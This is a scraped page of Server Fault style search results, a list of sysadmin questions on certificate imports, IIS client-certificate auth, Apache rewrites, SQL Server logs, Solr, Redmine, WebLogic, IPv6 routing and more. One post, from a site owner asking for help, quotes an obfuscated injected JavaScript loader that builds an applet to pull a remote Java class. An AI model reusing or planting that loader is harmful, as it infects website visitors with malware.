Search Results

Search found 46973 results on 1879 pages for 'return path'.

Page 1136/1879 | < Previous Page | 1132 1133 1134 1135 1136 1137 1138 1139 1140 1141 1142 1143  | Next Page >

  • HowTo import Certificate (pfx) with private key in WinXP

    - by Gunther
    Hello, I tried the whole day just to import a cetrificate in winXP, but I allways failed. I did following: Create the certificate with private key (no pasword): makecert -sr LocalMachine -ss My -pe -sky exchange -n "CN=TestCert" -a sha1 -sv TestCert.pvk TestCert.cer Then put certificate and private key together into pfx file: pvk2pfx.exe -pvk TestCert.pvk -spc TestCert.cer -pfx TestCert.pfx Import pfx file with commandline tool (German System): winhttpcertcfg.exe -i TestCert.pfx -a NT-AUTORITÄT\NETZWERKDIENST -c LOCAL_MACHINE\My Error: Unable to import contents of PFX file. Please make sure the filename and path, as well as the password, are correct. Hint: "NT-AUTORITÄT\NETZWERKDIENST" -- "NT-AUTHORITY\NETWORKSERVICE" Filename is ok, password was not set. Even if I set the password (e.g. "MyPassword") in Step 1 and type at the end of step 3: ... -p MyPassword I got the same error. Then I tried to import in the certificate console (mmc with certificate snap-in). There i got following error: "Der private Schlüssel, den Sie importieren, erfordert möglicherweise einen Dienstanbieter, der nicht installiert ist." -- "The imported private key may requires a service-supplier which is not installed". But the Microsoft Crypto-Service is up and running. What else can I do? On Windows Vista and Windows 7 I got this running without these problems. I need this Certificate to run a WCF Service. Thanks in advance for any hint. Regards, Gunther

    Read the article

  • Getting 401 when using client certificate with IIS 7.5

    - by Jacob
    I'm trying to configure a web site hosted under IIS 7.5 so that requests to a specific location require client certificate authentication. With my current setup, I still get a "401 - Unauthorized: Access is denied due to invalid credentials" when accessing the location with my client cert. Here's the web.config fragment that sets things up: <location path="MyWebService.asmx"> <system.webServer> <security> <access sslFlags="Ssl, SslNegotiateCert"/> <authentication> <windowsAuthentication enabled="false"/> <anonymousAuthentication enabled="false"/> <digestAuthentication enabled="false"/> <basicAuthentication enabled="false"/> <iisClientCertificateMappingAuthentication enabled="true" oneToOneCertificateMappingsEnabled="true"> <oneToOneMappings> <add enabled="true" certificate="MIICFDCCAYGgAwIBAgIQ+I0z6z8OWqpBIJt2lJHi6jAJBgUrDgMCHQUAMCQxIjAgBgNVBAMTGURldiBDZXJ0aWZpY2F0ZSBBdXRob3JpdHkwHhcNMTAxMjI5MjI1ODE0WhcNMzkxMjMxMjM1OTU5WjAaMRgwFgYDVQQDEw9kZXYgY2xpZW50IGNlcnQwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBANJi10hI+Zt0OuNr6eduiUe6WwPtyMxh+hZtr/7eY3YezeJHC95Z+NqJCAW0n+ODHOsbkd3DuyK1YV+nKzyeGAJBDSFNdaMSnMtR6hQG47xKgtUphPFBKe64XXTG+ueQHkzOHmGuyHHD1fSli62i2V+NMG1SQqW9ed8NBN+lmqWZAgMBAAGjWTBXMFUGA1UdAQROMEyAENGUhUP+dENeJJ1nw3gR0NahJjAkMSIwIAYDVQQDExlEZXYgQ2VydGlmaWNhdGUgQXV0aG9yaXR5ghB6CLh2g6i5ikrpVODj8CpBMAkGBSsOAwIdBQADgYEAwwHjpVNWddgEY17i1kyG4gKxSTq0F3CMf1AdWVRUbNvJc+O68vcRaWEBZDo99MESIUjmNhjXxk4LDuvV1buPpwQmPbhb6mkm0BNIISapVP/cK0Htu4bbjYAraT6JP5Km5qZCc0iHZQJZuch7Uy6G9kXQXaweJMiHL06+GHx355Y="/> </oneToOneMappings> </iisClientCertificateMappingAuthentication> </authentication> </security> </system.webServer> </location> The client certificate I'm using in my web browser matches what I've placed in the web.config. What am I doing wrong here?

    Read the article

  • Apache2 - mod_rewrite : RequestHeader and environment variables

    - by Guillaume
    I try to get the value of the request parameter "authorization" and to store it in the header "Authorization" of the request. The first rewrite rule works fine. In the second rewrite rule the value of $2 does not seem to be stored in the environement variable. As a consequence the request header "Authorization" is empty. Any idea ? Thanks. <VirtualHost *:8010> RewriteLog "/var/apache2/logs/rewrite.log" RewriteLogLevel 9 RewriteEngine On RewriteRule ^/(.*)&authorization=@(.*)@(.*) http://<ip>:<port>/$1&authorization=@$2@$3 [L,P] RewriteRule ^/(.*)&authorization=@(.*)@(.*) - [E=AUTHORIZATION:$2,NE] RequestHeader add "Authorization" "%{AUTHORIZATION}e" </VirtualHost> I need to handle several cases because sometimes parameters are in the path and sometines they are in the query. Depending on the user. This last case fails. The header value for AUTHORIZATION looks empty. # if the query string includes the authorization parameter RewriteCond %{QUERY_STRING} ^(.*)authorization=@(.*)@(.*)$ # keep the value of the parameter in the AUTHORIZATION variable and redirect RewriteRule ^/(.*) http://<ip>:<port>/ [E=AUTHORIZATION:%2,NE,L,P] # add the value of AUTHORIZATION in the header RequestHeader add "Authorization" "%{AUTHORIZATION}e"

    Read the article

  • How do I identify and fix the cause of transaction log growth on SIMPLE recovery model databases?

    - by Stuart B
    I recently upgraded our SQL Server 2008 installations to service pack 2. One of our databases is on the simple recovery model, but its transaction log is growing extremely fast. The path I'm currently investigating is that we have a transaction somewhere out there stuck in active state. Here is why: select name, recovery_model_desc, log_reuse_wait_desc from sys.databases where name in ('SimpleDB') name recovery_model_desc log_reuse_wait_desc SimpleDB SIMPLE ACTIVE_TRANSACTION When I check my active transactions, I get the following. Note that I installed SP2 and restarted our server on 12/25 at around noonish. select transaction_id, name, transaction_begin_time, transaction_type from sys.dm_tran_active_transactions transaction_id name transaction_begin_time transaction_type 233 worktable 2010-12-25 12:44:29.283 2 236 worktable 2010-12-25 12:44:29.283 2 238 worktable 2010-12-25 12:44:29.283 2 240 worktable 2010-12-25 12:44:29.283 2 243 worktable 2010-12-25 12:44:29.283 2 245 worktable 2010-12-25 12:44:29.283 2 62210 tran_sp_MScreate_peer_tables 2010-12-25 12:45:00.880 1 55422856 user_transaction 2010-12-28 16:41:56.703 1 55422889 SELECT 2010-12-28 16:41:57.303 2 470 LobStorageProviderSession 2010-12-25 12:44:30.510 2 Note that according to the documentation a transaction_type of 1 means read/write, and 2 means read-only. So, my line of thinking is that the trans_sp_MScreate_peer_tables transaction is stuck for some reason and holding up transaction log truncation. Is this a plausible scenario? Correct me if my line of thinking is off, as I'm not a SQL Server expert. If this is correct, how do I erase that transaction so that my transaction log is truncated as usual?

    Read the article

  • solr php extension fails to run on newest Debian Wheezy

    - by hijarian
    I'm trying to use the Solr PHP extension on the recently-upgraded Debian Wheezy. It installs both from PECL and from sources flawlessly but instead of giving me expected functionality it gives me this on every PHP run: PHP Warning: PHP Startup: Unable to load dynamic library '/usr/lib/php5/20100525/solr.so' - /usr/lib/php5/20100525/solr.so: undefined symbol: curl_easy_getinfo in Unknown on line 0 Also scripts which use the extension throws an error PHP Error[2]: include(SolrClient.php): failed to open stream: No such file or directory in file <...path to my autoloader...> My main point is that it was set up before and worked like a charm. In the upgrade among the relevant packages only the versions of PHP and libcurl was changed. Instance of Solr itself was left as is. I have all possible libcurl libraries: $ locate libcurl ... /usr/lib/x86_64-linux-gnu/libcurl-gnutls.so.3 /usr/lib/x86_64-linux-gnu/libcurl-gnutls.so.4 /usr/lib/x86_64-linux-gnu/libcurl-gnutls.so.4.2.0 /usr/lib/x86_64-linux-gnu/libcurl.a /usr/lib/x86_64-linux-gnu/libcurl.la /usr/lib/x86_64-linux-gnu/libcurl.so /usr/lib/x86_64-linux-gnu/libcurl.so.3 /usr/lib/x86_64-linux-gnu/libcurl.so.4 /usr/lib/x86_64-linux-gnu/libcurl.so.4.2.0 ... /usr/lib32/libcurl.so.3 /usr/lib32/libcurl.so.4 /usr/lib32/libcurl.so.4.2.0 ... I have instaled the php5-curl package version 5.4.4-2 with aptitude. I installed the Sorl extensions both with sudo pecl install solr (with various combinations of -f and -n flags and tried solr-beta too) and with wget ... cd ... phpize ./configure make make install I'm installing the 1.0.2 version of extension because it worked before the upgrade from Squeeze to Wheezy. As I said earlier, extension installs without any errors. I have already added the extension=solr.so incantation to the /etc/php5/mods-available/solr.ini What magic should I do to make solr extension work? Is this true that the only solution that I have is to downgrade the libcurl version as it was before the upgrade?

    Read the article

  • Weblogic 12 and the CLI

    - by Rig
    I am working with WebLogic on Fedora 19 and am attempting to use the CLI tools to no avail. It appears these were deprecated as far back as WebLogic 9 however I was assured they are still there and still functional. As it stands I have a need to use them if they are in fact functional. What appears to the case is that the weblogic jar file is not being loaded correctly to the classpath by this script after trying to manually add it to the classpath as it fails when trying to add those jars via java -classpath <path>. I've spent a lot of time so far trying to get this sorted out but I'm wondering what I may be missing here. My Java runtime is version 7, Fedora is 19, and WebLogic is 12.1. When I run env after running the provided set environment script it appears to have no impact from what I can see. (I'll add that later when I get back to that machine). I'm mostly a Windows developer so some of this is a topic I'm not well versed in. [foo@localhost bin]$ ./setDomainEnv.sh [foo@localhost bin]$ java weblogic.Admin -url t3://localhost:7001 -username <username> -password <password> HELP Error: Could not find or load main class weblogic.Admin [foo@localhost bin]$ ls -ltar total 72 drwxr-x--- 2 foo foo 4096 Jun 2 07:36 service_migration drwxr-x--- 2 foo foo 4096 Jun 2 07:36 server_migration drwxr-x--- 2 foo foo 4096 Jun 2 07:36 nodemanager -rwxr-x--- 1 foo foo 1267 Jun 2 07:36 setStartupEnv.sh -rwxr-x--- 1 foo foo 1105 Jun 2 07:36 startNodeManager.sh -rwxr-x--- 1 foo foo 5765 Jun 2 07:36 startWebLogic.sh -rwxr-x--- 1 foo foo 2001 Jun 2 07:36 stopWebLogic.sh -rwxr-x--- 1 foo foo 3170 Jun 2 07:36 startManagedWebLogic.sh -rwxr-x--- 1 foo foo 2776 Jun 2 07:36 stopManagedWebLogic.sh -rwxrwxrwx 1 foo foo 14136 Jun 2 07:36 setDomainEnv.sh -rwxr-x--- 1 foo foo 2060 Jun 2 07:36 startComponent.sh drwxr-x--- 5 foo foo 4096 Jun 2 07:36 . -rwxr-x--- 1 foo foo 1726 Jun 2 07:36 stopComponent.sh drwxr-x--- 12 foo foo 4096 Jun 2 07:45 ..

    Read the article

  • How to create a shared lock blocking an intent exclusive lock

    - by FremenFreedom
    As I understand it, a SELECT statement will place a shared lock on the rows that it will return. While that SELECT is running, if an UPDATE statement comes along and needs to grab an intent exclusive lock then that UPDATE statement will need to wait until the SELECT statement releases its shared locks. I am trying to test this SELECT shared lock thing by doing a BEGIN TRAN and then running a SELECT, not COMMITing, and then running an UPDATE in another session on the exact same row. The UPDATE worked fine -- no lock, no wait. So this must not be a valid way to simulate a shared lock blocking an intent exclusive lock? Can you give me a scenario where I can create a lock with a SELECT that would force an UPDATE to wait? I'm working with SQL Server 2000 and 2005 across a linked server: the table is on the 2005 instance, the select is happening on 2000, and the update is executed from 2005. All in SSMS 2005.

    Read the article

  • Redmine subversion won't ignore certificate error even if told

    - by Pekka
    I have set up a copy of Redmine through the Bitnami Redmine Stack and am having trouble accessing a remote SVN repository through https. The trouble seems to be related to the fact that I don't have a signed certificate, and the certificate provided doesn't match the host name (I am accessing the same server through a number of host names). I am new to Ruby, Mongrel, Rails and Redmine. Following the advice in this forum thread, I changed the path Redmine uses to invoke the svn client in \apps\redmine\lib\ redmine\scm\adapters\subversion_adapter.rb from SVN_BIN = "svn" to SVN_BIN = "svn --trust-server-cert --non-interactive --config-dir c:/user/temp" I was hoping that the --trust-server-cert option would fix the certificate problem. However, I am still getting the following error message in mongrel.log: svn: OPTIONS of 'https://server.xyz:8443/svn/reponame': Server certificate verification failed: certificate issued for a different hostname, issuer is not trusted (https://server.xyz:8443) Does anybody know what to do about this? Additional info: I re-started the mongrel service after each change I am sure the configuration change has taken effect because subversion has created a full configuration directory in c:\user\temp I can access the remote repository using command line svn no problem The remote repository runs on a Windows box with VisualSVN

    Read the article

  • Malware Cross Site Scriptinig attack / XSS Attack?

    - by user124176
    I have been hit by an Cross Site Scripting / XSS / RFI Attack, where I cant find it anywhere in the source of the files and Hashes on files have not been changed according to OSSEC HIDS that I run real time monitoring on all webdirs. The Attack happens on IE9 Only it and appends java script code like beneath, notice that it starts after /html tag closes normally. : scXXpt language="javascXXpt"var enuwjo = function(gqumas, yhxxju, zbkpilf, xzzvhld){var xew = function(iso) {var crh, eaq, i; var owb=""; crh = iso.length; for (i = 0; i < crh; ++i) {eaq = iso.charCodeAt(i)-2;owb = owb + String.fromCharCode(eaq);} return(owb); } var janlq=document.createElement(xew("crrngv"));janlq.setAttribute(xew("eqfg"), xew(gqumas));janlq.setAttribute(xew("ctejkxg"), xew("jvvr<11"+yhxxju));janlq.setAttribute(xew("ykfvj"), "1");janlq.setAttribute(xew("jgkijv"), "1");var lgtwyi=document.createElement(xew("rctco"));lgtwyi.setAttribute(xew("pcog"),xew(zbkpilf));lgtwyi.setAttribute(xew("xcnwg"),xew(xzzvhld));janlq.appendChild(lgtwyi);document.body.appendChild(janlq); } ; enuwjo("vxfgwtogg0dcrcmnwe0encuu","g{g0o{yge{0kp129;5","mlit{ttmdttponfhrrexihpe","fh;ccfe:85:5d9872;2;f569276h5268ff9;34:25;7d:8:7h8c68777;;822c73"); No code has been changed on file as far as my HIDS says ... but I can see in my Error log, the following... File does not exist: /var/www/vhosts/superkids.dk/ggtest/tvdeurmee In the Access log, the following IP - - [09/Jun/2012:23:30:13 +0200] "GET /tvdeurmee/bapakluc.class HTTP/1.1" 404 504 "-" "Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_04" IP - - [09/Jun/2012:23:30:13 +0200] "GET /tvdeurmee/bapakluc/class.class HTTP/1.1" 404 509 "-" "Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_04" Now... the folder or path /tvdeurmee/bapakluc/ does not exist on the server in question, nor does the Java Class class.class, yet it still looks like an local call to the server and it was getting an "404 File not found / 504 Gateway Timeout" (attack was blocked by local machine, hence the timeout / not found) Any idea on how to prevent the attack ? Im working on using HTML Purifier, but that might not be the correct idea it seems, according to some replies im getting on their forum :) Kind regards, Steven

    Read the article

  • sudo: apache restarting a service on CentOS

    - by WaveyDavey
    I need my web app to restart the dansguardian service (on CentOS) so it needs to run '/sbin/service dansguardian restart' I have a shellscript in /home/topological called apacherestart.sh which does the following: #!/bin/sh id=`id` /sbin/service dansguardian restart r=$? return $r This runs ok (logger statement in script for testing output to syslog, so I know it's running) To make it run, I put this in /etc/sudoers: User_Alias APACHE=www # Cmnd alias specification Cmnd_Alias HTTPRESTART=/home/topological/apacherestart.sh,/sbin/e-smith/db,/etc/rc7.d/S91dansguardian # Defaults specification # User privilege specification root ALL=(ALL) ALL APACHE ALL=(ALL) NOPASSWD: HTTPRESTART So far so good. But the service does not restart. To test this I created a user david, and fudged the uid/gid in /etc/passwd to be the same as www: www:x:102:102:e-smith web server:/home/e-smith:/bin/false david:x:102:102:David:/home/e-smith/files/users/david:/bin/bash then logged in as david and tried to run the apacherestart.sh. The problem I get is: /etc/rc7.d/S91dansguardian: line 51: /sbin/e-smith/db: Permission denied even though S91dansguardian and db are in the sudoers command list. Any ideas?

    Read the article

  • Adobe Acrobat Pro 9.0 on Windows 7 print to network share gives error

    - by Archit Baweja
    I've recently upgraded a client's workstations to brand new computers, with Windows 7 Professional. The server is still Windows Server 2003. The server has 2-3 file shares that get mapped to users' workstations as drives. The client has also upgraded from Acrobat 6.0 to 9.0 Pro. Since the upgrade, when the client tries to print to the Adobe PDF printer (aka convert something to PDF via the printer interface), it gives an error in the queue if the file is being saved on the network drive. If I instead provide a local path, the file "prints" fine. Additionally, if I change the Adobe PDF printer's settings to "don't spool, print directly to printer", it prints to the network share fine, but then it resets that setting every time. Things I've checked for: Permissions on the network share. The user and the computer has full access. We even gave the "Everyone" ibject full access. Reinstall Adobe Acrobat Pro 9.0 Run updates to upgrade to 9.3.4 Has anyone else bumped into such a problem? The support fellows from Adobe are just taking me around in circles. They don't seem to have a clue either.

    Read the article

  • Drive XML returning Windows Volume Shadow Service Error

    - by Ssvarc
    I'm trying to image a SATA laptop hard drive, using DriveImageXML, that is attached to my computer via a USB adapter. I'm running Win7 Ultimate 64 bit. DriveXML is returning: Could not initialize Windows Volume Shadow Service (VSS). ERROR C:\Program Files (x86)\Runtime Software\Drivelmage XML\vss64.exe failed to start. ERROR TIMEOUT Make sure VSSVC.EXE is running in your task manager. Click Help for more information. VSSVC.EXE is running in Task Manager, as is VSS64.exe. Looking at the FAQ on the Runtime webpage this turned up: Please verify in Settings-Control Panel-Administrative Tools-Services that the following services are enabled: MS Software Shadow Copy Provider Volume Shadow Copy Also make sure you are able to stop and start these services. Possible reasons for VSS failures: For VSS to work, at least one volume in your computer must be NTFS. If you use only FAT drives, VSS will not function. The required NTFS volume does not need to be identical with the volume you want to image. You should make sure that VSSVC.EXE is running in your task manager. If the problems persist, registering "oleaut.dll" and "oleaut32.dll" using "regsvr32" might help. Both of those services are running and can be started and stopped without issue. Using "regsvr32" to register ""oleaut32.dll" returns successful, but "oleaut.dll" returns: The module "oleaut.dll" failed to load. Make sure the binary is stored at the specified path or debug it to check for problems with the binary or dependent .DLL files. The specified module could not be found. Some other information that might be relevant. Browsing to the drive is successful, but accessing certain folders returns an "access" error. Windows runs a permissions adder that adds the current user profile to the NFTS permissions. Could this be the cause of the issue? DriveImage XML is running as Administrator. Thoughts?

    Read the article

  • How do you guys handle custom yum repository?

    - by luckytaxi
    I have a bunch of tools (nagios, munin, puppet, etc...) that gets installed on all my servers. I'm in the process of building a local yum repository. I know most folks just dump all the rpms into a single folder (broken down into the correct path) and then run createrepo inside the directory. However, what would happen if you had to update the rpms? I ask because I was going to throw each software into its own folder. Example one, put all packages inside one folder (custom_software) /admin/software/custom_software/5.4/i386 /admin/software/custom_software/5.4/x86_64 /admin/software/custom_software/4.6/i386 /admin/software/custom_software/4.6/x86_64 What I'm thinking of ... /admin/software/custom_software/nagios/5.4/i386 /admin/software/custom_software/nagios/5.4/x86_64 /admin/software/custom_software/nagios/4.6/i386 /admin/software/custom_software/nagios/4.6/x86_64 /admin/software/custom_software/puppet/5.4/i386 /admin/software/custom_software/puppet/5.4/x86_64 /admin/software/custom_software/puppet/4.6/i386 /admin/software/custom_software/puppet/4.6/x86_64 Ths way, if I had to update to the latest version of puppet, I can save manage the files accordingly. I wouldn't know which rpms belong to which software if I threw them into one big folder. Makes sense?

    Read the article

  • Unable to connect to Adobe Connect

    - by ub3rst4r
    I am having troubles trying to connect my colleges Adobe Connect. I have done the test meeting connection and it will say "Unable to connect". I have tried connecting on 3 other computers and it works with flying colors. I am running Norton 360 on my computer and I also tried it on my other laptop thats also running Norton 360 and it works on that laptop. I also checked my hosts file and that is not the problem because I am able to connect to the server (on port 80) but not the Adobe Connect port (port 1935). The only thing in it is "127.0.0.1 localhost" Here are the details from the log that the test created: Player Version: WIN 11,3,300,271 App-Server returned: code:ok, servers=rtmp://connect.bowvalleycollege.ca:1935/_rtmp://localhost:8506/,rtmpt://connect.bowvalleycollege.ca:443/_rtmp://localhost:8506/ ERROR: FMS Server did not return correctly! Here is my specifications: Windows 7 SP1 x64 Norton 360 v6.3 (latest) It won't connect in Firefox v15, Chrome v19, or IE9 All of my computers are connected through the same router (D-Link DIR-625) Any ideas?

    Read the article

  • File upload permissions issue on Windows Server 2008 R2 IIS 7.5 PHP 5.3 with Drupal v.7.26

    - by Taras
    I have website on Drupal version: 7.26 OS on server is Windows Server 2008 R2 Web server $_SERVER["SERVER_SOFTWARE"]: Microsoft-IIS/7.5 Server API: CGI/FastCGI Core PHP Version: 5.3.28 file_uploads: On post_max_size: 75M upload_max_filesize: 50M upload_tmp_dir: C:\inetpub\wwwroot\tmp memory_limit: 128M open_basedir: C:\inetpub\wwwroot;C:\inetpub\wwwroot\tmp When I go to /admin/config/media/file-system I see error messages: The directory sites\default\files exists but is not writable and could not be made writable. The directory tmp exists but is not writable and could not be made writable. Public file system path: sites\default\files Temporary directory: tmp I have set permissions on folders C:\inetpub\wwwroot\tmp : IIS_IUSRS : Full control C:\inetpub\wwwroot\sites\default\files : IIS_IUSRS : Full control I am working as Administrator user: C:\Users\Administrator\Downloadsecho %username% Administrator I can`t change Read Only Attributes for these folders. Every time I do this change and press Apply button and Apply changes to this folder, subfolders and files is checked and press OK button it displays Applying attributes... dialog when it finishing I press OK button on folder properties dialog closing it. When I open Properties dialog once again I see Read-only is checked again. How can I fix it?

    Read the article

  • FTP Server on AIX 6.1 returns - "A system call received a parameter that is not valid"

    - by Manglu
    A FTP Server that is built in with AIX (we are using version 6.1) returns this error message as a response code - "A system call received a parameter that is not valid" I am unable to see why the FTP Server returns such a value as response code. My search does not yield any results and am a bit dumbstuck on why this is happening. I can see some related responses which says the AIX server might return this strange looking message when some Concurrent I/O occurs but i can't see anything in the context of the inbuilt FTP Server. Looking for assistance.

    Read the article

  • Configure IPv6 routing

    - by godlark
    I've got IPv6 addresses from SIXXS. My host is connected with SIXXS network over a AICCU tunnel ("sixxs" interface). My host address is 2001:::2, the host on the end has address 2001:::1. On my host IPv6 is fully accessible. I have problem with configuring IPv6 network on VMs. I use VirtualBox, the VM (Ubuntu) uses tap1 (on the host bridged by br0) #!/bin/sh PATH=/sbin:/usr/bin:/bin:/usr/bin:/usr/sbin # create a tap tunctl -t tap1 ip link set up dev tap1 # create the bridge brctl addbr br0 brctl addif br0 tap1 # set the IP address and routing ip link set up dev br0 ip -6 route del 2001:6a0:200:172::/64 dev sixxs ip -6 route add 2001:6a0:200:172::1 dev sixxs ip -6 addr add 2001:6a0:200:172::2/64 dev br0 ip -6 route add 2001:6a0:200:172::2/64 dev br0 Host: routing table: 2001:6a0:200:172::1 dev sixxs metric 1024 2001:6a0:200:172::/64 dev br0 proto kernel metric 256 2001:6a0:200:172::/64 dev br0 metric 1024 2000::/3 dev sixxs metric 1024 fe80::/64 dev eth0 proto kernel metric 256 fe80::/64 dev sixxs proto kernel metric 256 fe80::/64 dev br0 proto kernel metric 256 fe80::/64 dev tap1 proto kernel metric 256 default via 2001:6a0:200:172::1 dev sixxs metric 1024 Guest: interface eth1 (it is connected with tap1): auto eth1 iface eth1 inet6 static address 2001:6a0:200:172::3 netmask 64 gateway 2001:6a0:200:172::2 Guest: routing table 2001:6a0:200:172::/64 dev eth1 proto kernel metric 256 fe80::/64 dev eth0 proto kernel metric 256 fe80::/64 dev eth1 proto kernel metric 256 default via 2001:6a0:200:172::2 dev eth1 metric 1024 The guest pings to the host, the host pings to the guest, the host pings to 2001:6a0:200:172::1, but the guest doesn't ping to 2001:6a0:200:172::1. The guest tries to ping, on the host (by tcdump) I can capture its packets, but the host doesn't send them to 2001:6a0:200:172::1. What have I missed in configuration?

    Read the article

  • Amazon EC2 - HTTPS - Certificate body is invalid. The body must not contain a private key

    - by Tam Minh
    I'm very new to Amazon EC2. I am trying to setup https for my website, I follow the offical instruction from amazon doc: http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/configuring-https.html When I Upload a Signed Certificate using AWS command aws iam upload-server-certificate --server-certificate-name dichcumga --certificate-body file://mycert.pem --private-key file://signedkey.pem --certificate-chain file://mychain.pem And I got error A client error (MalformedCertificate) occurred when calling the UploadServerCert ificate operation: Certificate body is invalid. The body must not contain a private key. mycert.pem is a combination of private.pem and signedkey.pem (which return by VeriSign) copy private.pem+signedkey.pem mycert.pem Please help to shed a light. Thank you in advance.

    Read the article

  • Why are symbolic links not working in MySQL?

    - by Eno
    I'm having an issue, I searched a lot but I'm not sure if it's related to a previous security patch. On the last version of MySQL on Debian Lenny ( 5.0.51a-24 ) I need to share one table between two db, those two db are in the same path ( /var/lib/mysql/db1 & db2 ). I created symbolic links for db2 pointing to the table in db1. When I query the same table from db2 I get this : 'ERROR 1030 (HY000): Got error 140 from storage engine' This is how it looks : test-lan:/var/lib/mysql/test3# ls -alh drwx------ 2 mysql mysql 4.0K 2010-08-30 13:28 . drwxr-xr-x 6 mysql mysql 4.0K 2010-08-30 13:29 .. lrwxrwxrwx 1 mysql mysql 28 2010-08-30 13:28 blbl.frm -> /var/lib/mysql/test/blbl.frm lrwxrwxrwx 1 mysql mysql 28 2010-08-30 13:28 blbl.MYD -> /var/lib/mysql/test/blbl.MYD lrwxrwxrwx 1 mysql mysql 28 2010-08-30 13:28 blbl.MYI -> /var/lib/mysql/test/blbl.MYI -rw-rw---- 1 mysql mysql 65 2010-08-30 13:24 db.opt I really need those symlinks, is there a way to make them working like before ? ( old MySQL-server is fine ) Thanks,

    Read the article

  • Word count for LaTeX within emacs

    - by Seamus
    I want to count how many words my LaTeX document has in it. I can do this by going to the website for the texcount package and using the web interface there. but that's not ideal. I'd rather have some shortcut within emacs to just return number of words in a file (or ideally number of words in file and in all files called by \input or \include within the document). I have downloaded texcount script, but I don't know what to do with it. That is, I don't know where to put the .pl file, and how to call it within emacs.

    Read the article

  • Apache2 - mod_rewrite : RequestHeader and environment variables

    - by Guillaume
    I try to get the value of the request parameter "authorization" and to store it in the header "Authorization" of the request. The first rewrite rule works fine. In the second rewrite rule the value of $2 does not seem to be stored in the environement variable. As a consequence the request header "Authorization" is empty. Any idea ? Thanks. <VirtualHost *:8010> RewriteLog "/var/apache2/logs/rewrite.log" RewriteLogLevel 9 RewriteEngine On RewriteRule ^/(.*)&authorization=@(.*)@(.*) http://<ip>:<port>/$1&authorization=@$2@$3 [L,P] RewriteRule ^/(.*)&authorization=@(.*)@(.*) - [E=AUTHORIZATION:$2,NE] RequestHeader add "Authorization" "%{AUTHORIZATION}e" </VirtualHost> I need to handle several cases because sometimes parameters are in the path and sometines they are in the query. Depending on the user. This last case fails. The header value for AUTHORIZATION looks empty. # if the query string includes the authorization parameter RewriteCond %{QUERY_STRING} ^(.*)authorization=@(.*)@(.*)$ # keep the value of the parameter in the AUTHORIZATION variable and redirect RewriteRule ^/(.*) http://<ip>:<port>/ [E=AUTHORIZATION:%2,NE,L,P] # add the value of AUTHORIZATION in the header RequestHeader add "Authorization" "%{AUTHORIZATION}e"

    Read the article

  • MySQL, replacing &nbsp; with... nothing (delete those, please!)

    - by javipas
    I'm trying to purge my WordPress content from "false" carriage return (CR). These are caused after a migration of my content, that now presents from time to time a &nbsp; code that makes the web rendering engine to "paint" a CR where I would like to be nothing. The paragraphs seem to have a double CR because of this, and look too far apart. I'd like to be able to make a MySQL query in order to get rid of that strings, but at the moment I haven't found the key. What I've tried is UPDATE wp_posts set post_content = replace (post_content,'&nbsp;',' '); But i get <p> </p> where before were the &nbsp; strings. This seems not the answer at all. Could it have to be with the ampersand, and in that case, should I use something like &amp;nbsp; or something similar?

    Read the article

  • cyrus-imapd is not work with sasldb2, but postfix work

    - by Felix Chang
    centos6 64 bits: when i use pop3 for access cyrus-imapd: S: +OK li557-53 Cyrus POP3 v2.3.16-Fedora-RPM-2.3.16-6.el6_2.5 server ready <3176565056.1354071404@li557-53> C: USER [email protected] S: +OK Name is a valid mailbox C: PASS abcabc S: -ERR [AUTH] Invalid login C: QUIT and with USER "abc" failed too. my imapd.conf: configdirectory: /var/lib/imap partition-default: /var/spool/imap admins: cyrus sievedir: /var/lib/imap/sieve sendmail: /usr/sbin/sendmail hashimapspool: true sasl_pwcheck_method: auxprop sasl_mech_list: PLAIN LOGIN tls_cert_file: /etc/pki/cyrus-imapd/cyrus-imapd.pem tls_key_file: /etc/pki/cyrus-imapd/cyrus-imapd.pem tls_ca_file: /etc/pki/tls/certs/ca-bundle.crt allowplaintext: true #defaultdomain: myabc.com loginrealms: myabc.com sasldblistuser2: [email protected]: userPassword but my postfix is ok with same user. /etc/sasl2/smtpd.conf pwcheck_method: auxprop mech_list: plain login log_level:7 saslauthd_path:/var/run/saslauthd/mux /etc/postfix/main.cf queue_directory = /var/spool/postfix command_directory = /usr/sbin daemon_directory = /usr/libexec/postfix data_directory = /var/lib/postfix mail_owner = postfix myhostname = localhost mydomain = myabc.com myorigin = $mydomain inet_interfaces = all inet_protocols = all mydestination = $myhostname, localhost.$mydomain, localhost,$mydomain local_recipient_maps = unknown_local_recipient_reject_code = 550 mynetworks_style = subnet mynetworks = 192.168.0.0/24, 127.0.0.0/8 relay_domains = $mydestination alias_maps = hash:/etc/aliases alias_database = hash:/etc/aliases home_mailbox = Maildir/ mailbox_transport = lmtp:unix:/var/lib/imap/socket/lmtp debug_peer_level = 2 debugger_command = PATH=/bin:/usr/bin:/usr/local/bin:/usr/X11R6/bin ddd $daemon_directory/$process_name $process_id & sleep 5 sendmail_path = /usr/sbin/sendmail.postfix newaliases_path = /usr/bin/newaliases.postfix mailq_path = /usr/bin/mailq.postfix setgid_group = postdrop html_directory = no manpage_directory = /usr/share/man sample_directory = /usr/share/doc/postfix-2.6.6/samples readme_directory = /usr/share/doc/postfix-2.6.6/README_FILES smtpd_sasl_auth_enable = yes smtpd_sasl_local_domain = $myhostname smtpd_sasl_security_options = noanonymous smtpd_recipient_restrictions = permit_mynetworks, permit_sasl_authenticated, reject_unauth_destination smtpd_sasl_security_restrictions = permit_mynetworks, permit_sasl_authenticated, reject_unauth_destination message_size_limit = 15728640 broken_sasl_auth_clients=yes please help.

    Read the article

  • ISCSI Target Ubuntu

    - by erai
